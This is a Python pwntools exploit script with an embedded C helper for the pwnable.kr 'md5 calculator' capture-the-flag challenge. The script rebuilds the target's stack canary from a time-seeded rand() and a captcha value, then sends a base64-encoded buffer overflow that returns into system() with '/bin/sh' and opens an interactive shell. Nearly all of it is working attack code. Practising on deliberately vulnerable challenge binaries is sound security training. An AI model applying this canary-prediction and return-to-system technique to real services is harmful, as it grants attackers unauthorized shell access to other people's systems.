http://pwnable.kr/ [md5 calculator]
#!/usr/bin/env python
# coding: utf-8
import calendar
import os
import random
import re
import subprocess
import time
import urllib2

from pwn import *
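elf = ELF('./hash')
plt_system = elf.plt['system']

# The target seeds libc's rand() from the wall clock, so its stack canary can
# be rebuilt by anyone who knows the second it started in (see hashc.c below).
# Flip REMOTE to attack the live service instead of a local ./hash.
REMOTE = False

if REMOTE:
    # Borrow the server's clock from an HTTP Date header.  HTTP dates are
    # always GMT, so convert with calendar.timegm(); time.mktime() would
    # treat the parsed struct_time as *local* time and skew the seed by the
    # host's UTC offset unless the host happens to run in UTC.
    date = urllib2.urlopen('http://pwnable.kr').headers['Date']
    t = calendar.timegm(time.strptime(date, '%a, %d %b %Y %H:%M:%S %Z'))
    # The service calls time(NULL) slightly after the header was stamped;
    # the original exploit guesses a 0-3 s skew.  Rerun if the guess misses.
    t += random.randint(0, 3)
    p = remote('127.0.0.1', 9002)
else:
    # Local target: it will see the same clock we do.
    t = int(time.time())
    p = process('./hash')

# The first prompt is a "captcha": an integer (possibly negative, 5+ digits)
# the binary derives from its rand() stream and expects echoed back.
captcha_line = p.recvline_regex(r'(-?[\d]{5,})')
captcha = re.search(r'(-?[\d]+)', captcha_line).group(0)
p.sendline(captcha)

# Recover the canary from the captcha.  The binary computes
#   c = nums[1] + nums[5] + nums[2] - nums[3] + nums[7] + canary + nums[4] - nums[6]
# from the first eight rand() outputs after srand(t), so
#   canary = c - nums[1] - nums[5] - nums[2] + nums[3] - nums[7] - nums[4] + nums[6]
# A small C helper does this so the exact libc rand() sequence is used
# (build it next to this script: gcc -o hashc hashc.c):
#
#   #include <stdio.h>
#   #include <stdlib.h>
#
#   int main(int argc, char* argv[]) {
#       int t = atoi(argv[1]);
#       int c = atoi(argv[2]);
#       int canary = 0;
#       int nums[8];
#
#       srand(t);
#       int i = 0;
#       for(;i <= 7; i++) {
#           nums[i] = rand();
#       }
#       // c = nums[1] + nums[5] + nums[2] - nums[3] + nums[7] + canary + nums[4] - nums[6]
#       canary = c - nums[1] - nums[5] - nums[2] + nums[3] - nums[7] - nums[4] + nums[6];
#       printf("%x\n", canary);
#
#       return 0;
#   }
#
# Invoke it argv-style rather than through a shell: the captcha is data we
# received from the target, and although the regex above already confines it
# to [-0-9], keeping it out of a shell command line costs nothing.
# check_output() also fails loudly if hashc is missing or exits non-zero,
# where os.popen() would have handed back an empty string and int() would
# have died on "0x".
canary_hex = subprocess.check_output(['./hashc', str(t), captcha]).strip()
# hashc prints bare hex ("%x"); int(..., 16) accepts it with or without 0x.
canary = int(canary_hex, 16)

# Overflowed frame, per the original exploit: 512 bytes of buffer, the 4-byte
# canary, 12 more bytes up to the saved return address.  Return into
# system@plt with a dummy return address and a pointer to "/bin/sh".
#
# The raw (still base64-encoded) input line is kept in .bss at INPUT_BUF.
# The binary payload is 540 bytes, which base64 expands to 540 * 4 / 3 = 720
# characters (540 is a multiple of 3, so no '=' padding), so a "/bin/sh\0"
# appended right after the base64 text sits at INPUT_BUF + 720.
INPUT_BUF = 0x0804B0E0
PAYLOAD_LEN = 512 + 4 + 12 + 4 + 4 + 4          # 540
SHELL_PTR = INPUT_BUF + PAYLOAD_LEN * 4 // 3      # floor division: p32() wants an int
payload = (
    'A' * 512
    + p32(canary)
    + 'A' * 12
    + p32(plt_system)
    + p32(0x8048a00)      # address system() would return to; presumably moot once the shell is up
    + p32(SHELL_PTR)
)
assert len(payload) == PAYLOAD_LEN, len(payload)  # SHELL_PTR offset depends on this

p.sendline(b64e(payload) + '/bin/sh\0')
p.interactive()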